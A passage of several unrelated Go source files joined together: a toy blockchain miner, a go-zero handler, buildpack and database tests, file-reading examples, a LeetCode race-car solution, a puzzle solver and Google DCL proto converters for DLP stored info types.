if b.Timestamp != otherBlock.Timestamp {
return false
}
if b.PrevHash != otherBlock.PrevHash {
return false
}
if b.Hash != otherBlock.Hash {
return false
}
if b.Difficulty != otherBlock.Difficulty {
return false
}
if b.Nonce != otherBlock.Nonce {
return false
}
for _, bTaction := range b.Transactions {
if !otherBlock.hasTransaction(bTaction) {
return false
}
}
return true
}
func generateBlock(oldBlock Block, tactions []Taction, difficulty int) Block {
var newBlock Block
t := time.Now()
//privKey := getPrivateKey(publicKey)
//this transaction is reward for mining the block
newTOut := tactionOut{
getThisPublicKey(),
1}
newTIn := tactionIn{
"",
"",
0,
"" }
newTrans := Taction{
"",
newTOut,
newTIn }
(*Taction).generateTransactionId(&newTrans)
newTrans.TIn.Signature = (*Taction).SignTaction(&newTrans)
coinbaseTaction := newTrans
newBlock.Index = oldBlock.Index + 1
newBlock.Timestamp = t.String()
newBlock.Transactions = append([]Taction{coinbaseTaction}, tactions...)
newBlock.PrevHash = oldBlock.Hash
newBlock.Difficulty = difficulty
for i := 0; ; i++ {
hexVal := fmt.Sprintf("%x", i)
newBlock.Nonce = hexVal
hash := newBlock.calculateHash()
if !isHashValid(hash, newBlock.Difficulty) {
// if someone else has beaten us to this block, make a new block with this data.
if !oldBlock.equals(Blockchain[len(Blockchain)-1]) {
missingTactions := filterCommittedTactions(tactions)
pendingTransactions = append(pendingTransactions, missingTactions...)
return generateBlock(Blockchain[len(Blockchain)-1], pendingTransactions, difficulty)
}
fmt.Println(hash, " do more work!")
time.Sleep(time.Second)
continue
} else {
fmt.Println(hash, " work done!")
newBlock.Hash = hash
break
}
}
newBlock.updateNewOwnership()
newBlock.deleteOldOwnership()
return newBlock
}
//check if hash has correct number of zeros
func isHashValid(hash string, difficulty int) bool {
prefix := strings.Repeat("0", difficulty)
return strings.HasPrefix(hash, prefix)
}
/*
func (b *Block) getWalletAmt(privKey string) float64 {
var wallet float64
wallet = 0
for _, trans := range b.Transactions {
if trans.PrivateKey2 == privKey {
wallet += trans.Amount
}
if trans.PrivateKey1 == privKey {
wallet -= trans.Amount
}
}
return wallet
}
*/
|
package logic
import (
"context"
"github.com/just-coding-0/learn_example/micro_service/zero/rpc/history/history"
"github.com/just-coding-0/learn_example/micro_service/zero/internal/svc"
"github.com/just-coding-0/learn_example/micro_service/zero/internal/types"
"github.com/tal-tech/go-zero/core/logx"
)
type GetEchoLogic struct {
logx.Logger
ctx context.Context
svcCtx *svc.ServiceContext
}
func NewGetEchoLogic(ctx context.Context, svcCtx *svc.ServiceContext) GetEchoLogic {
return GetEchoLogic{
Logger: logx.WithContext(ctx),
ctx: ctx,
svcCtx: svcCtx,
}
}
func (l *GetEchoLogic) GetEcho(req types.GetEchoStatsRequest) (*types.GetEchoStatsResponse, error) {
resp,err:=l.svcCtx.History.Get(l.ctx,&history.GetRequest{
Msg: req.Msg,
})
if err != nil {
return nil,err
}
return &types.GetEchoStatsResponse{
LastEcho: resp.LastEcho,
Times: resp.Times,
Msg: resp.Msg,
}, nil
}
|
package integration_test
import (
"github.com/cloudfoundry/libbuildpack/cutlass"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("running supply buildpacks before the staticfile buildpack", func() {
var app *cutlass.App
AfterEach(func() {
if app != nil {
app.Destroy()
}
app = nil
})
Context("the app is pushed once", func() {
BeforeEach(func() {
if ok, err := cutlass.ApiGreaterThan("2.65.1"); err != nil || !ok {
Skip("API version does not have multi-buildpack support")
}
app = cutlass.New(Fixtures("fake_supply_staticfile_app"))
app.Buildpacks = []string{
"https://github.com/cloudfoundry/dotnet-core-buildpack#master",
"staticfile_buildpack",
}
app.Disk = "1G"
})
It("finds the supplied dependency in the runtime container", func() {
PushAppAndConfirm(app)
Expect(app.Stdout.String()).To(ContainSubstring("Supplying Dotnet Core"))
Expect(app.GetBody("/")).To(ContainSubstring("This is an example app for Cloud Foundry that is only static HTML/JS/CSS assets."))
})
})
})
|
package database
import (
"reflect"
"testing"
"github.com/ubclaunchpad/pinpoint/protobuf/models"
)
var club = &models.Club{
ClubID: "1234",
Description: "1337 h4x0r",
}
var user = &models.ClubUser{
ClubID: "1234",
Email: "abc@def.com",
Role: "Artist",
}
func TestDatabase_AddNewEvent_GetEvent(t *testing.T) {
type args struct {
clubID string
event *models.EventProps
}
type errs struct {
addEvent bool
getEvent bool
getEvents bool
}
tests := []struct {
name string
args args
err errs
wantEvent bool
}{
{"invalid event", args{
"1234",
&models.EventProps{},
}, errs{true, true, true}, false},
{"invalid club id", args{
"",
&models.EventProps{
Period: "Winter 2019",
EventID: "001",
Name: "Recruiting",
},
}, errs{true, true, true}, false},
{"valid", args{
"1234",
&models.EventProps{
Period: "Winter 2019",
EventID: "001",
Name: "Recruiting",
},
}, errs{false, false, false}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
db, _ := newTestDB(t)
defer db.DeleteClub(club.ClubID)
db.AddNewClub(club, user)
defer db.DeleteEvent(tt.args.clubID, tt.args.event.Period, tt.args.event.EventID)
if err := db.AddNewEvent(tt.args.clubID, tt.args.event); (err != nil) != tt.err.addEvent {
t.Errorf("Database.AddNewEvent() error = %v, wantErr %v", err, tt.err.addEvent)
}
event, err := db.GetEvent(tt.args.clubID, tt.args.event.Period, tt.args.event.EventID)
if (err != nil) != tt.err.getEvent {
t.Errorf("Database.GetEvent() error = %v, wantErr %v", err, tt.err.getEvent)
return
}
if tt.wantEvent {
if !tt.err.getEvent && !reflect.DeepEqual(tt.args.event, event) {
t.Errorf("expected: %+v, actual: %+v", tt.args.event, event)
return
}
} else {
if event != nil {
t.Errorf("Didn't expect event, got: %+v", event)
}
}
events, err := db.GetEvents(tt.args.clubID, tt.args.event.Period)
if (err != nil) != tt.err.getEvents {
t.Errorf("Database.GetEvents() error = %v, wantErr %v", err, tt.err.getEvents)
return
}
if tt.wantEvent {
expected := []*models.EventProps{tt.args.event}
if !tt.err.getEvent && !reflect.DeepEqual(expected, events) {
t.Errorf("expected: %+v, actual: %+v", expected, events)
return
}
} else {
if len(events) > 0 {
t.Errorf("Didn't expect events, got: %+v", events)
}
}
})
}
}
func TestDatabase_Applicant(t *testing.T) {
type args struct {
clubID string
applicant *models.Applicant
}
type errs struct {
addApplicant bool
getApplicant bool
getApplicants bool
}
tests := []struct {
name string
args args
err errs
wantApplicant bool
}{
{"invalid applicant", args{
"",
&models.Applicant{},
}, errs{true, true, true}, false},
{"invalid club id", args{
"",
&models.Applicant{
Period: "Winter Semester",
Email: user.Email,
Name: "Bob",
},
}, errs{true, true, true}, false},
{"valid", args{
"1234",
&models.Applicant{
Period: "Winter Semester",
Email: user.Email,
Name: "Rob",
},
}, errs{false, false, false}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
db, _ := newTestDB(t)
defer db.DeleteClub(club.ClubID)
db.AddNewClub(club, user)
defer db.DeleteApplicant(tt.args.clubID, tt.args.applicant.Period, tt.args.applicant.Email)
if err := db.AddNewApplicant(tt.args.clubID, tt.args.applicant); (err != nil) != tt.err.addApplicant {
t.Errorf("Database.AddNewClub() error = %v, wantErr %v", err, tt.err.addApplicant)
}
app, err := db.GetApplicant(tt.args.clubID, tt.args.applicant.Period, tt.args.applicant.Email)
if (err != nil) != tt.err.getApplicant {
t.Errorf("Database.GetClub() error = %v, wantErr %v", err, tt.err.getApplicant)
}
if tt.wantApplicant {
if !reflect.DeepEqual(tt.args.applicant, app) {
t.Errorf("Failed to get expect applicant, expected: %+v, actual: %+v", tt.args.applicant, app)
return
}
}
apps, err := db.GetApplicants(tt.args.clubID, tt.args.applicant.Period)
if (err != nil) != tt.err.getApplicants {
t.Errorf("Database.GetApplicants() error = %v, wantErr %v", err, tt.err.getApplicants)
}
if tt.wantApplicant {
if !reflect.DeepEqual([]*models.Applicant{tt.args.applicant}, apps) {
t.Errorf("Failed to get expect applicants, expected: %+v, actual: %+v", []*models.Applicant{tt.args.applicant}, apps)
return
}
} else {
if len(apps) > 0 {
t.Errorf("Didn't expect tags, got: %+v", apps)
}
}
})
}
}
func TestDatabase_Application(t *testing.T) {
type args struct {
clubID string
application *models.Application
}
type errs struct {
addApplication bool
getApplication bool
getApplications bool
}
tests := []struct {
name string
args args
err errs
wantApplication bool
}{
{"invalid applicant", args{
"1234",
&models.Application{},
}, errs{true, true, true}, false},
{"invalid club id", args{
"",
&models.Application{
Period: "Winter 2019",
EventID: "001",
Email: "abc@def.com",
Name: "Recruiting",
Entries: map[string]*models.FieldEntry{},
},
}, errs{true, true, true}, false},
{"valid", args{
"1234",
&models.Application{
Period: "Winter 2019",
EventID: "001",
Email: "abc@def.com",
Name: "Recruiting",
Entries: map[string]*models.FieldEntry{},
},
}, errs{false, false, false}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
db, _ := newTestDB(t)
defer db.DeleteClub(club.ClubID)
db.AddNewClub(club, user)
defer db.DeleteApplication(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID, tt.args.application.Email)
if err := db.AddNewApplication(tt.args.clubID, tt.args.application); (err != nil) != tt.err.addApplication {
t.Errorf("Database.AddNewApplication() error = %v, wantErr %v", err, tt.err.addApplication)
}
app, err := db.GetApplication(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID, tt.args.application.Email)
if (err != nil) != tt.err.getApplication {
t.Errorf("Database.GetApplication() error = %v, wantErr %v", err, tt.err.getApplication)
}
var checkApp func(*models.Application, *models.Application) bool
checkApp = func(actual *models.Application, expected *models.Application) bool {
if actual.Period != app.Period || actual.EventID != app.EventID || actual.Email != app.Email {
return false
}
return true
}
if tt.wantApplication {
if !checkApp(tt.args.application, app) {
t.Errorf("Failed to get expected application, expected: %+v, actual: %+v", *tt.args.application, *app)
return
}
}
apps, err := db.GetApplications(tt.args.clubID, tt.args.application.Period, tt.args.application.EventID)
if (err != nil) != tt.err.getApplications {
t.Errorf("Database.GetApplications() error = %v, wantErr %v", err, tt.err.getApplications)
}
if tt.wantApplication {
expected := []*models.Application{tt.args.application}
for i := 0; i < len(apps); i++ {
if !checkApp(expected[i], apps[i]) {
t.Errorf("Failed to get expected applications, expected: %+v, actual: %+v", expected, apps)
return
}
}
} else {
if len(apps) > 0 {
t.Errorf("Didn't expect applications, got: %+v", apps)
}
}
})
}
}
func TestDatabase_AddTag(t *testing.T) {
type args struct {
clubID string
tag *models.Tag
}
type errs struct {
addTag bool
getTags bool
}
tests := []struct {
name string
args args
err errs
wantTag bool
}{
{"invalid tag", args{
"1234",
&models.Tag{},
}, errs{true, true}, false},
{"invalid club id", args{
"",
&models.Tag{
Period: "Winter 2019",
TagName: "Designer",
},
}, errs{true, true}, false},
{"valid everything", args{
"1234",
&models.Tag{
Period: "Winter 2019",
TagName: "Designer",
},
}, errs{false, false}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
db, _ := newTestDB(t)
defer db.DeleteClub(club.ClubID)
db.AddNewClub(club, user)
defer db.DeleteTag(tt.args.clubID, tt.args.tag.Period, tt.args.tag.TagName)
if err := db.AddTag(tt.args.clubID, tt.args.tag); (err != nil) != tt.err.addTag {
t.Errorf("Database.AddTag() error = %v, wantErr %v", err, tt.err.addTag)
}
tags, err := db.GetTags(tt.args.clubID, tt.args.tag.Period)
if (err != nil) != tt.err.getTags {
t.Errorf("Database.GetTags() error = %v, wantErr %v", err, tt.err.getTags)
return
}
if tt.wantTag {
expected := []*models.Tag{tt.args.tag}
if !reflect.DeepEqual(expected, tags) {
t.Errorf("Failed to get expect tags, expected: %+v, actual: %+v", expected, tags)
return
}
} else {
if len(tags) > 0 {
t.Errorf("Didn't expect tags, got: %+v", tags)
}
}
})
}
}
|
package command
import (
"fmt"
"data-importer/mq/dataworker"
)
func (c *APICommand) SubScribeTaskInfo(hub *Hub) {
go func() {
msgs, err := c.MsgQueue.ConsumeMessage(dataworker.TASKMESSAGE)
if err != nil {
return
}
for d := range msgs {
fmt.Println("Receive msg, time:", d.Timestamp, "body: ", string(d.Body))
for k, v := range hub.clients {
if v && k.clientType == dataworker.TASKMESSAGE {
fmt.Println("Send websocket, time:", d.Timestamp, "body: ", string(d.Body))
k.writeTaskInfo(d.Body)
}
}
}
}()
}
|
package main
import (
"bufio"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"strings"
)
func readFromConsole() {
reader := bufio.NewReader(os.Stdin)
for {
val, err := reader.ReadString('\n')
if err != nil {
fmt.Println(err)
}
if strings.Trim(val, "\n") == "end" {
break
}
fmt.Println(val)
}
}
func readFileByLine() {
file, err := os.Open("./car.json")
if err != nil {
fmt.Println(err)
return
}
defer file.Close()
reader := bufio.NewReader(file)
for {
val, err := reader.ReadString('\n')
if err == io.EOF {
break
}
fmt.Println(val)
}
}
func readFileContent() {
content, err := ioutil.ReadFile("./car.json")
if err != nil {
fmt.Println(err)
return
}
fmt.Println(string(content))
}
func readFileWithBuffer() {
file, err := os.Open("./input.go")
defer file.Close()
if err != nil {
fmt.Println(err)
return
}
buffer := make([]byte, 2048)
reader := bufio.NewReader(file)
reader.Read(buffer)
fmt.Println(string(buffer))
}
func readFileFromZip() {
var r *bufio.Reader
file, err := os.Open("test.go.gz")
if err != nil {
fmt.Println(err)
return
}
defer file.Close()
reader, err := gzip.NewReader(file)
if err != nil {
r = bufio.NewReader(file)
} else {
r = bufio.NewReader(reader)
}
for {
value, err := r.ReadString('\n')
if err == io.EOF {
return
}
fmt.Println(value)
}
}
//
//func main() {
// //readFromConsole()
// // readFileByLine()
// // readFileContent()
// // readFileWithBuffer()
// readFileFromZip()
//}
|
package script
type Value interface {
T() Type
AnyValue
}
type AnyValue interface {
ValueFromCtx(AnyCtx) Value
}
type Values []Value
//Runtime retrieved the runtime values.
func (values Values) Runtime() (result []interface{}) {
for _, value := range values {
result = append(result, value.T().Get())
}
return
}
|
package main
import (
"fmt"
"math"
)
// 818. 赛车
// 你的赛车起始停留在位置 0,速度为 +1,正行驶在一个无限长的数轴上。(车也可以向负数方向行驶。)
// 你的车会根据一系列由 A(加速)和 R(倒车)组成的指令进行自动驾驶 。
// 当车得到指令 "A" 时, 将会做出以下操作: position += speed, speed *= 2。
// 当车得到指令 "R" 时, 将会做出以下操作:如果当前速度是正数,则将车速调整为 speed = -1 ;否则将车速调整为 speed = 1。 (当前所处位置不变。)
// 例如,当得到一系列指令 "AAR" 后, 你的车将会走过位置 0->1->3->3,并且速度变化为 1->2->4->-1。
// 现在给定一个目标位置,请给出能够到达目标位置的最短指令列表的长度。
// 说明:
// 1 <= target(目标位置) <= 10000。
// https://leetcode-cn.com/problems/race-car/
func main() {
fmt.Println(racecar(3)) // 2
fmt.Println(racecar(6)) // 5
}
// 法一:动态规划
// dp[i]表示target是i时的最短指令长度
// target = 2^n-1时,指令均为A,这时一定是最短指令
// 当target是其他位置时,假设2^(k-1) <= target < 2^k
// 那么可以先走(k-1)次A,到达位置(2^(k-1)-1),通过R转向,再走m个A,再走R转向,递归走剩余路程
// 也可以走k次A,到达(2^k-1),通过R转向,再走剩余路程:(i<<k)-1-target
var dp [10001]int
func racecar(target int) int {
if dp[target] > 0 {
return dp[target]
}
k := int(math.Floor(math.Log2(float64(target)))) + 1
if target+1 == (1 << k) {
return k
}
// 走k次A,到达(2^k-1),通过R转向,再走剩余路程
dp[target] = k + 1 + racecar((1<<k)-1-target)
// 走(k-1)次A,到达位置(2^(k-1)-1),通过R转向,再走m个A,再走R转向,递归走剩余路程
// m的取值范围是[0, k-1)
for m := 0; m < k-1; m++ {
dp[target] = getMin(dp[target], k+m+1+racecar(target-(1<<(k-1))+(1<<m)))
}
return dp[target]
}
func getMin(a, b int) int {
if a < b {
return a
}
return b
}
|
package main
import (
"bufio"
"fmt"
"os"
"day3/bag"
)
func getInput(path string) []bag.Bag {
file, _ := os.Open(path)
defer file.Close()
var bags []bag.Bag
scanner := bufio.NewScanner(file)
for scanner.Scan() {
curr := bag.NewBag(scanner.Text())
bags = append(bags, curr)
}
return bags
}
func assignGroups(input []bag.Bag) []bag.Group {
groups := []bag.Group{}
for i := 0; i < len(input); i += 3 {
groups = append(groups, bag.NewGroup(input[i], input[i+1], input[i+2]))
}
return groups
}
func sumAllSingleBagRepeatItemPriorities(bags []bag.Bag) int {
sum := 0
for _, bag := range bags {
sum += bag.GetSingleBagRepeatedRunePriority()
}
return sum
}
func sumAllGroupRepeatItemPriorities(groups []bag.Group) int {
sum := 0
for _, group := range groups {
sum += group.GetGroupRepeatedRunePriority()
}
return sum
}
func main() {
bags := getInput("data/data.txt")
fmt.Printf("1. Sum of all repeated item priorities: %d\n", sumAllSingleBagRepeatItemPriorities(bags))
groups := assignGroups(bags)
fmt.Printf("2. Sum of all group repeated item priorities: %d\n", sumAllGroupRepeatItemPriorities(groups))
}
|
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
alphapb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/dlp/alpha/dlp_alpha_go_proto"
emptypb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/empty_go_proto"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/dlp/alpha"
)
// StoredInfoTypeServer implements the gRPC interface for StoredInfoType.
type StoredInfoTypeServer struct{}
// ProtoToStoredInfoTypeLargeCustomDictionary converts a StoredInfoTypeLargeCustomDictionary object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionary(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary) *alpha.StoredInfoTypeLargeCustomDictionary {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionary{
OutputPath: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath(p.GetOutputPath()),
CloudStorageFileSet: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet(p.GetCloudStorageFileSet()),
BigQueryField: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField(p.GetBigQueryField()),
}
return obj
}
// ProtoToStoredInfoTypeLargeCustomDictionaryOutputPath converts a StoredInfoTypeLargeCustomDictionaryOutputPath object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath) *alpha.StoredInfoTypeLargeCustomDictionaryOutputPath {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionaryOutputPath{
Path: dcl.StringOrNil(p.GetPath()),
}
return obj
}
// ProtoToStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet converts a StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet) *alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet{
Url: dcl.StringOrNil(p.GetUrl()),
}
return obj
}
// ProtoToStoredInfoTypeLargeCustomDictionaryBigQueryField converts a StoredInfoTypeLargeCustomDictionaryBigQueryField object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField{
Table: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable(p.GetTable()),
Field: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField(p.GetField()),
}
return obj
}
// ProtoToStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable{
ProjectId: dcl.StringOrNil(p.GetProjectId()),
DatasetId: dcl.StringOrNil(p.GetDatasetId()),
TableId: dcl.StringOrNil(p.GetTableId()),
}
return obj
}
// ProtoToStoredInfoTypeLargeCustomDictionaryBigQueryFieldField converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldField object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField{
Name: dcl.StringOrNil(p.GetName()),
}
return obj
}
// ProtoToStoredInfoTypeDictionary converts a StoredInfoTypeDictionary object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeDictionary(p *alphapb.DlpAlphaStoredInfoTypeDictionary) *alpha.StoredInfoTypeDictionary {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeDictionary{
WordList: ProtoToDlpAlphaStoredInfoTypeDictionaryWordList(p.GetWordList()),
CloudStoragePath: ProtoToDlpAlphaStoredInfoTypeDictionaryCloudStoragePath(p.GetCloudStoragePath()),
}
return obj
}
// ProtoToStoredInfoTypeDictionaryWordList converts a StoredInfoTypeDictionaryWordList object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeDictionaryWordList(p *alphapb.DlpAlphaStoredInfoTypeDictionaryWordList) *alpha.StoredInfoTypeDictionaryWordList {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeDictionaryWordList{}
for _, r := range p.GetWords() {
obj.Words = append(obj.Words, r)
}
return obj
}
// ProtoToStoredInfoTypeDictionaryCloudStoragePath converts a StoredInfoTypeDictionaryCloudStoragePath object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeDictionaryCloudStoragePath(p *alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath) *alpha.StoredInfoTypeDictionaryCloudStoragePath {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeDictionaryCloudStoragePath{
Path: dcl.StringOrNil(p.GetPath()),
}
return obj
}
// ProtoToStoredInfoTypeRegex converts a StoredInfoTypeRegex object from its proto representation.
func ProtoToDlpAlphaStoredInfoTypeRegex(p *alphapb.DlpAlphaStoredInfoTypeRegex) *alpha.StoredInfoTypeRegex {
if p == nil {
return nil
}
obj := &alpha.StoredInfoTypeRegex{
Pattern: dcl.StringOrNil(p.GetPattern()),
}
for _, r := range p.GetGroupIndexes() {
obj.GroupIndexes = append(obj.GroupIndexes, r)
}
return obj
}
// ProtoToStoredInfoType converts a StoredInfoType resource from its proto representation.
func ProtoToStoredInfoType(p *alphapb.DlpAlphaStoredInfoType) *alpha.StoredInfoType {
obj := &alpha.StoredInfoType{
Name: dcl.StringOrNil(p.GetName()),
DisplayName: dcl.StringOrNil(p.GetDisplayName()),
Description: dcl.StringOrNil(p.GetDescription()),
LargeCustomDictionary: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionary(p.GetLargeCustomDictionary()),
Dictionary: ProtoToDlpAlphaStoredInfoTypeDictionary(p.GetDictionary()),
Regex: ProtoToDlpAlphaStoredInfoTypeRegex(p.GetRegex()),
Parent: dcl.StringOrNil(p.GetParent()),
Location: dcl.StringOrNil(p.GetLocation()),
}
return obj
}
// StoredInfoTypeLargeCustomDictionaryToProto converts a StoredInfoTypeLargeCustomDictionary object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryToProto(o *alpha.StoredInfoTypeLargeCustomDictionary) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary{}
p.SetOutputPath(DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPathToProto(o.OutputPath))
p.SetCloudStorageFileSet(DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto(o.CloudStorageFileSet))
p.SetBigQueryField(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto(o.BigQueryField))
return p
}
// StoredInfoTypeLargeCustomDictionaryOutputPathToProto converts a StoredInfoTypeLargeCustomDictionaryOutputPath object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPathToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryOutputPath) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath{}
p.SetPath(dcl.ValueOrEmptyString(o.Path))
return p
}
// StoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto converts a StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet{}
p.SetUrl(dcl.ValueOrEmptyString(o.Url))
return p
}
// StoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto converts a StoredInfoTypeLargeCustomDictionaryBigQueryField object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField{}
p.SetTable(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto(o.Table))
p.SetField(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto(o.Field))
return p
}
// StoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable{}
p.SetProjectId(dcl.ValueOrEmptyString(o.ProjectId))
p.SetDatasetId(dcl.ValueOrEmptyString(o.DatasetId))
p.SetTableId(dcl.ValueOrEmptyString(o.TableId))
return p
}
// StoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldField object to its proto representation.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField{}
p.SetName(dcl.ValueOrEmptyString(o.Name))
return p
}
// StoredInfoTypeDictionaryToProto converts a StoredInfoTypeDictionary object to its proto representation.
func DlpAlphaStoredInfoTypeDictionaryToProto(o *alpha.StoredInfoTypeDictionary) *alphapb.DlpAlphaStoredInfoTypeDictionary {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeDictionary{}
p.SetWordList(DlpAlphaStoredInfoTypeDictionaryWordListToProto(o.WordList))
p.SetCloudStoragePath(DlpAlphaStoredInfoTypeDictionaryCloudStoragePathToProto(o.CloudStoragePath))
return p
}
// StoredInfoTypeDictionaryWordListToProto converts a StoredInfoTypeDictionaryWordList object to its proto representation.
func DlpAlphaStoredInfoTypeDictionaryWordListToProto(o *alpha.StoredInfoTypeDictionaryWordList) *alphapb.DlpAlphaStoredInfoTypeDictionaryWordList {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeDictionaryWordList{}
sWords := make([]string, len(o.Words))
for i, r := range o.Words {
sWords[i] = r
}
p.SetWords(sWords)
return p
}
// StoredInfoTypeDictionaryCloudStoragePathToProto converts a StoredInfoTypeDictionaryCloudStoragePath object to its proto representation.
func DlpAlphaStoredInfoTypeDictionaryCloudStoragePathToProto(o *alpha.StoredInfoTypeDictionaryCloudStoragePath) *alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath {
if o == nil {
return nil
}
p := &alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath{}
p.SetPath(dcl.ValueOrEmptyString(o.Path))
return p
}
// StoredInfoTypeRegexToProto converts a StoredInfoTypeRegex object to its proto representation.
func DlpAlphaStoredInfoTypeRegexToProto(o *alpha.StoredInfoTypeRegex) *alphapb.DlpAlphaStoredInfoTypeRegex {
if o == nil {
return nil
}
